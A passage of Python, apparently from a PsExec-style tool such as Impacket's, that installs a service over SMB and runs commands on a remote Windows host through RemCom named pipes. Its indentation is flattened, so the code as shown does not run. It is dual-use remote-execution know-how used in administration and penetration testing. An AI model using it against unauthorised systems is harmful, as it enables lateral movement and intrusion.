f = open(self.__exeFile)
except Exception as e:
print(e)
sys.exit(1)
installService = serviceinstall.ServiceInstall(s, f,
svcName,
executableName)
installService.install()
if self.__exeFile is not None:
f.close()
tid = s.connectTree('IPC$')
fid_main = self.openPipe(s, tid, '\RemCom_communicaton', 0x12019f)
packet = RemComMessage()
pid = os.getpid()
packet['Machine'] = ''.join([random.choice(string.letters)
for i in range(4)])
if self.__path is not None:
packet['WorkingDir'] = self.__path
packet['Command'] = self.__command
packet['ProcessID'] = pid
s.writeNamedPipe(tid, fid_main, str(packet))
# Here we'll store the command we type so we don't print it back ;)
# ( I know.. globals are nasty :P )
global LastDataSent
LastDataSent = ''
retCode = None
# Create the pipes threads
stdin_pipe = RemoteStdInPipe(rpctransport,
'\%s%s%d' % (RemComSTDIN,
packet['Machine'],
packet['ProcessID']),
smbconnection.smb.FILE_WRITE_DATA |
smbconnection.smb.FILE_APPEND_DATA,
installService.getShare())
stdin_pipe.start()
stdout_pipe = RemoteStdOutPipe(rpctransport,
'\%s%s%d' % (RemComSTDOUT,
packet['Machine'],
packet['ProcessID']),
smbconnection.smb.FILE_READ_DATA)
stdout_pipe.start()
stderr_pipe = RemoteStdErrPipe(rpctransport,
'\%s%s%d' % (RemComSTDERR,
packet['Machine'],
packet['ProcessID']),
smbconnection.smb.FILE_READ_DATA)
stderr_pipe.start()
# And we stay here till the end
ans = s.readNamedPipe(tid, fid_main, 8)
if len(ans):
retCode = RemComResponse(ans)
print("[*] Process %s finished with ErrorCode: %d, "
"ReturnCode: %d" % (self.__command, retCode['ErrorCode'],
retCode['ReturnCode']))
installService.uninstall()
unInstalled = True
sys.exit(retCode['ReturnCode'])
except Exception:
if unInstalled is False:
installService.uninstall()
sys.stdout.flush()
if retCode:
sys.exit(retCode['ReturnCode'])
else:
sys.exit(1)